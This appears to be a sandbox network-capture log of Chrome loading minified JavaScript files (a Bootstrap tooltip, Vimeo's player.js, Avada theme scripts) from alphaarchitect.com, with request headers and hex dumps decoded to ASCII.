                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 44 55 52 41 54 49 4f 4e 29 3a 73 28 29 2c 74 68 69 73 2e 68 6f 76 65 72 53 74 61 74 65 3d 6e 75 6c 6c 2c 74 68 69 73 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 78 54 69 74 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 3b 28 74 2e 61 74 74 72 28 22 74 69 74 6c 65 22 29 7c 7c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 2e 61 74 74 72 28 22 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 22 29 29 26 26 74 2e 61 74 74 72 28 22 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 22 2c 74 2e 61 74 74 72 28 22 74 69 74 6c 65 22 29 7c 7c 22 22 29 2e 61 74 74 72 28 22 74 69 74 6c 65 22 2c 22 22 29
                                                                                                                                                                                                                                                                        Data Ascii: teTransitionEnd(l.TRANSITION_DURATION):s(),this.hoverState=null,this},l.prototype.fixTitle=function(){var t=this.$element;(t.attr("title")||"string"!=typeof t.attr("data-original-title"))&&t.attr("data-original-title",t.attr("title")||"").attr("title","")
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 65 66 74 2d 70 3a 68 3e 72 2e 72 69 67 68 74 26 26 28 6e 2e 6c 65 66 74 3d 72 2e 6c 65 66 74 2b 72 2e 77 69 64 74 68 2d 68 29 7d 72 65 74 75 72 6e 20 6e 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 54 69 74 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2c 65 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3b 72 65 74 75 72 6e 20 74 2e 61 74 74 72 28 22 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 22 29 7c 7c 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 74 6c 65 3f 65 2e 74 69 74 6c 65 2e 63 61 6c 6c 28 74 5b 30 5d 29 3a 65 2e 74 69 74 6c 65 29 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 55 49 44 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 64 6f 7b 74 2b 3d 7e 7e 28
                                                                                                                                                                                                                                                                        Data Ascii: eft-p:h>r.right&&(n.left=r.left+r.width-h)}return n},l.prototype.getTitle=function(){var t=this.$element,e=this.options;return t.attr("data-original-title")||("function"==typeof e.title?e.title.call(t[0]):e.title)},l.prototype.getUID=function(t){do{t+=~~(
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC409INData Raw: 74 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 77 68 69 74 65 4c 69 73 74 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 61 6e 69 74 69 7a 65 46 6e 29 7d 3b 76 61 72 20 70 3d 74 2e 66 6e 2e 74 6f 6f 6c 74 69 70 3b 74 2e 66 6e 2e 74 6f 6f 6c 74 69 70 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 74 28 74 68 69 73 29 2c 6f 3d 69 2e 64 61 74 61 28 22 62 73 2e 74 6f 6f 6c 74 69 70 22 29 2c 6e 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 3b 21 6f 26 26 2f 64 65 73 74 72 6f 79 7c 68 69 64 65 2f 2e 74 65 73 74 28 65 29 7c 7c 28 6f 7c 7c 69 2e 64 61 74 61 28 22 62 73 2e 74 6f 6f 6c 74 69 70 22 2c 6f 3d 6e 65 77 20 6c 28 74 68 69 73 2c 6e 29 29 2c 22 73
                                                                                                                                                                                                                                                                        Data Ascii: t,this.options.whiteList,this.options.sanitizeFn)};var p=t.fn.tooltip;t.fn.tooltip=function(e){return this.each(function(){var i=t(this),o=i.data("bs.tooltip"),n="object"==typeof e&&e;!o&&/destroy|hide/.test(e)||(o||i.data("bs.tooltip",o=new l(this,n)),"s
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        114192.168.2.449872141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC834OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/vimeoPlayer.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:00 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-94a8"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147817
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba1eecaa42f7-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC877INData Raw: 37 64 63 35 0d 0a 2f 2a 21 20 40 76 69 6d 65 6f 2f 70 6c 61 79 65 72 20 76 32 2e 32 33 2e 30 20 7c 20 28 63 29 20 32 30 32 34 20 56 69 6d 65 6f 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 76 69 6d 65 6f 2f 70 6c 61 79 65 72 2e 6a 73 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d
                                                                                                                                                                                                                                                                        Data Ascii: 7dc5/*! @vimeo/player v2.23.0 | (c) 2024 Vimeo | MIT License | https://github.com/vimeo/player.js */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):((e="undefined"!=
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6e 2c 65 29 29 7d 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 29 7b 6a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 3b 76 61 72 20 61 3d 7b 7d 2c 65 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2c 73 3d 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 66 3d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 65 5b 74 5d 3d 6e 2e 76 61 6c 75 65 7d 2c 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3f 53 79 6d 62 6f 6c 3a 7b 7d 2c 6f 3d 74 2e 69 74 65 72 61 74 6f 72 7c 7c 22 40 40 69 74 65 72 61 74 6f 72 22 2c 6e 3d
                                                                                                                                                                                                                                                                        Data Ascii: ,Object.getOwnPropertyDescriptor(n,e))})}return t}function j(){j=function(){return a};var a={},e=Object.prototype,s=e.hasOwnProperty,f=Object.defineProperty||function(e,t,n){e[t]=n.value},t="function"==typeof Symbol?Symbol:{},o=t.iterator||"@@iterator",n=
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 29 3a 61 3a 28 6e 2e 6d 65 74 68 6f 64 3d 22 74 68 72 6f 77 22 2c 6e 2e 61 72 67 3d 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 69 74 65 72 61 74 6f 72 20 72 65 73 75 6c 74 20 69 73 20 6e 6f 74 20 61 6e 20 6f 62 6a 65 63 74 22 29 2c 6e 2e 64 65 6c 65 67 61 74 65 3d 6e 75 6c 6c 2c 68 29 7d 28 6e 2c 75 29 3b 69 66 28 72 29 7b 69 66 28 72 3d 3d 3d 68 29 63 6f 6e 74 69 6e 75 65 3b 72 65 74 75 72 6e 20 72 7d 7d 69 66 28 22 6e 65 78 74 22 3d 3d 3d 75 2e 6d 65 74 68 6f 64 29 75 2e 73 65 6e 74 3d 75 2e 5f 73 65 6e 74 3d 75 2e 61 72 67 3b 65 6c 73 65 20 69 66 28 22 74 68 72 6f 77 22 3d 3d 3d 75 2e 6d 65 74 68 6f 64 29 7b 69 66 28 22 73 75 73 70 65 6e 64 65 64 53 74 61 72 74 22 3d 3d 3d 63 29 74 68 72 6f 77 20 63 3d 22 63 6f 6d 70 6c 65 74 65 64 22 2c 75 2e 61 72
                                                                                                                                                                                                                                                                        Data Ascii: ):a:(n.method="throw",n.arg=new TypeError("iterator result is not an object"),n.delegate=null,h)}(n,u);if(r){if(r===h)continue;return r}}if("next"===u.method)u.sent=u._sent=u.arg;else if("throw"===u.method){if("suspendedStart"===c)throw c="completed",u.ar
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 6f 29 7d 29 7d 6f 28 69 2e 61 72 67 29 7d 28 6e 2c 72 2c 65 2c 74 29 7d 29 7d 72 65 74 75 72 6e 20 74 3d 74 3f 74 2e 74 68 65 6e 28 65 2c 65 29 3a 65 28 29 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 65 29 7b 76 61 72 20 74 3d 7b 74 72 79 4c 6f 63 3a 65 5b 30 5d 7d 3b 31 20 69 6e 20 65 26 26 28 74 2e 63 61 74 63 68 4c 6f 63 3d 65 5b 31 5d 29 2c 32 20 69 6e 20 65 26 26 28 74 2e 66 69 6e 61 6c 6c 79 4c 6f 63 3d 65 5b 32 5d 2c 74 2e 61 66 74 65 72 4c 6f 63 3d 65 5b 33 5d 29 2c 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 2e 70 75 73 68 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 45 28 65 29 7b 76 61 72 20 74 3d 65 2e 63 6f 6d 70 6c 65 74 69 6f 6e 7c 7c 7b 7d 3b 74 2e 74 79 70 65 3d 22 6e 6f 72 6d 61 6c 22 2c 64 65 6c 65 74 65 20 74 2e 61 72 67 2c 65 2e 63 6f 6d
                                                                                                                                                                                                                                                                        Data Ascii: o)})}o(i.arg)}(n,r,e,t)})}return t=t?t.then(e,e):e()}})}function k(e){var t={tryLoc:e[0]};1 in e&&(t.catchLoc=e[1]),2 in e&&(t.finallyLoc=e[2],t.afterLoc=e[3]),this.tryEntries.push(t)}function E(e){var t=e.completion||{};t.type="normal",delete t.arg,e.com
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 6c 75 65 3a 69 2e 6e 65 78 74 28 29 7d 29 7d 2c 77 28 67 29 2c 69 28 67 2c 72 2c 22 47 65 6e 65 72 61 74 6f 72 22 29 2c 69 28 67 2c 6f 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 29 2c 69 28 67 2c 22 74 6f 53 74 72 69 6e 67 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 47 65 6e 65 72 61 74 6f 72 5d 22 7d 29 2c 61 2e 6b 65 79 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 28 65 29 2c 72 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 6e 29 72 2e 70 75 73 68 28 74 29 3b 72 65 74 75 72 6e 20 72 2e 72 65 76 65 72 73 65 28 29 2c 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 66 6f 72 28 3b 72 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 74 3d 72 2e 70 6f 70 28 29 3b 69 66
                                                                                                                                                                                                                                                                        Data Ascii: lue:i.next()})},w(g),i(g,r,"Generator"),i(g,o,function(){return this}),i(g,"toString",function(){return"[object Generator]"}),a.keys=function(e){var n=Object(e),r=[];for(var t in n)r.push(t);return r.reverse(),function e(){for(;r.length;){var t=r.pop();if
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 62 72 75 70 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 2e 6c 65 6e 67 74 68 2d 31 3b 30 3c 3d 6e 3b 2d 2d 6e 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 5b 6e 5d 3b 69 66 28 72 2e 74 72 79 4c 6f 63 3c 3d 74 68 69 73 2e 70 72 65 76 26 26 73 2e 63 61 6c 6c 28 72 2c 22 66 69 6e 61 6c 6c 79 4c 6f 63 22 29 26 26 74 68 69 73 2e 70 72 65 76 3c 72 2e 66 69 6e 61 6c 6c 79 4c 6f 63 29 7b 76 61 72 20 6f 3d 72 3b 62 72 65 61 6b 7d 7d 6f 26 26 28 22 62 72 65 61 6b 22 3d 3d 3d 65 7c 7c 22 63 6f 6e 74 69 6e 75 65 22 3d 3d 3d 65 29 26 26 6f 2e 74 72 79 4c 6f 63 3c 3d 74 26 26 74 3c 3d 6f 2e 66 69 6e 61 6c 6c 79 4c 6f 63 26 26 28 6f 3d 6e 75 6c 6c 29 3b 76 61 72 20 69
                                                                                                                                                                                                                                                                        Data Ascii: brupt:function(e,t){for(var n=this.tryEntries.length-1;0<=n;--n){var r=this.tryEntries[n];if(r.tryLoc<=this.prev&&s.call(r,"finallyLoc")&&this.prev<r.finallyLoc){var o=r;break}}o&&("break"===e||"continue"===e)&&o.tryLoc<=t&&t<=o.finallyLoc&&(o=null);var i
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 22 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 63 28 72 2c 74 2c 6e 2c 6f 2c 69 2c 22 74 68 72 6f 77 22 2c 65 29 7d 6f 28 76 6f 69 64 20 30 29 7d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61
                                                                                                                                                                                                                                                                        Data Ascii: ",e)}function i(e){c(r,t,n,o,i,"throw",e)}o(void 0)})}}function l(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function o(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"va
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 6e 67 2e 63 61 6c 6c 28 74 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 29 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 74 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 29 7b 69 66 28 72 2e 68 61 73 28 65 29 29 72 65 74 75 72 6e 20 72 2e 67 65 74 28 65 29 3b 72 2e 73 65 74 28 65 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 61 72 67 75 6d 65 6e 74 73 2c 69 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74
                                                                                                                                                                                                                                                                        Data Ascii: ng.call(t).indexOf("[native code]")))return e;var t;if("function"!=typeof e)throw new TypeError("Super expression must either be null or a function");if(void 0!==r){if(r.has(e))return r.get(e);r.set(e,n)}function n(){return d(e,arguments,i(this).construct
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 6f 6e 63 61 74 28 65 2e 73 75 62 73 74 72 28 31 29 29 7d 66 75 6e 63 74 69 6f 6e 20 67 28 65 29 7b 72 65 74 75 72 6e 2f 5e 28 68 74 74 70 73 3f 3a 29 3f 5c 2f 5c 2f 28 28 28 28 70 6c 61 79 65 72 7c 77 77 77 29 5c 2e 29 3f 76 69 6d 65 6f 5c 2e 63 6f 6d 29 7c 28 28 70 6c 61 79 65 72 5c 2e 29 3f 5b 61 2d 7a 41 2d 5a 30 2d 39 2d 5d 2b 5c 2e 76 69 64 65 6f 6a 69 5c 2e 68 6b 29 29 28 3f 3d 24 7c 5c 2f 29 2f 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 77 28 65 29 7b 72 65 74 75 72 6e 2f 5e 68 74 74 70 73 3a 5c 2f 5c 2f 70 6c 61 79 65 72 5c 2e 28 28 76 69 6d 65 6f 5c 2e 63 6f 6d 29 7c 28 5b 61 2d 7a 41 2d 5a 30 2d 39 2d 5d 2b 5c 2e 76 69 64 65 6f 6a 69 5c 2e 68 6b 29 29 5c 2f 76 69 64 65 6f 5c 2f 5c 64 2b 2f 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                        Data Ascii: oncat(e.substr(1))}function g(e){return/^(https?:)?\/\/((((player|www)\.)?vimeo\.com)|((player\.)?[a-zA-Z0-9-]+\.videoji\.hk))(?=$|\/)/.test(e)}function w(e){return/^https:\/\/player\.((vimeo\.com)|([a-zA-Z0-9-]+\.videoji\.hk))\/video\/\d+/.test(e)}functi
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC1369INData Raw: 74 69 6f 6e 20 53 28 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 68 69 73 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 6f 6e 73 74 72 75 63 74 6f 72 20 57 65 61 6b 4d 61 70 20 72 65 71 75 69 72 65 73 20 27 6e 65 77 27 22 29 3b 69 66 28 4f 28 74 68 69 73 2c 22 5f 69 64 22 2c 22 5f 57 65 61 6b 4d 61 70 5f 22 2b 4e 28 29 2b 22 2e 22 2b 4e 28 29 29 2c 30 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 57 65 61 6b 4d 61 70 20 69 74 65 72 61 62 6c 65 20 69 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 22 29 7d 66 75 6e 63 74 69 6f 6e 20 43 28 65 2c 74 29 7b 69 66 28 21 46 28 65 29 7c 7c 21 54 2e 63 61 6c 6c 28 65 2c 22 5f 69 64 22 29 29 74 68 72 6f 77 20 6e 65 77 20 54
                                                                                                                                                                                                                                                                        Data Ascii: tion S(){if(void 0===this)throw new TypeError("Constructor WeakMap requires 'new'");if(O(this,"_id","_WeakMap_"+N()+"."+N()),0<arguments.length)throw new TypeError("WeakMap iterable is not supported")}function C(e,t){if(!F(e)||!T.call(e,"_id"))throw new T


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        115192.168.2.449873141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC844OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-general-global.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:00 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-1a3"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147817
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba1f0f8a4408-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC426INData Raw: 31 61 33 0d 0a 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 48 6f 76 65 72 54 6f 75 63 68 53 74 61 74 65 28 29 7b 76 61 72 20 6f 2c 65 3d 21 31 3b 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 6f 75 63 68 73 74 61 72 74 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6f 29 2c 65 3d 21 30 2c 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 61 64 64 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 74 6f 75 63 68 22 29 2c 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 6e 6f 2d 74 6f 75 63 68 22 29 2c 6f 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 3d 21 31 7d 2c 35 30 30 29 7d 2c 7b 70 61 73 73 69 76 65 3a 21 30 7d 29 2c
                                                                                                                                                                                                                                                                        Data Ascii: 1a3function checkHoverTouchState(){var o,e=!1;document.addEventListener("touchstart",function(){clearTimeout(o),e=!0,jQuery("body").addClass("fusion-touch"),jQuery("body").removeClass("fusion-no-touch"),o=setTimeout(function(){e=!1},500)},{passive:!0}),
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        116192.168.2.449874141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC830OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-general-footer.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
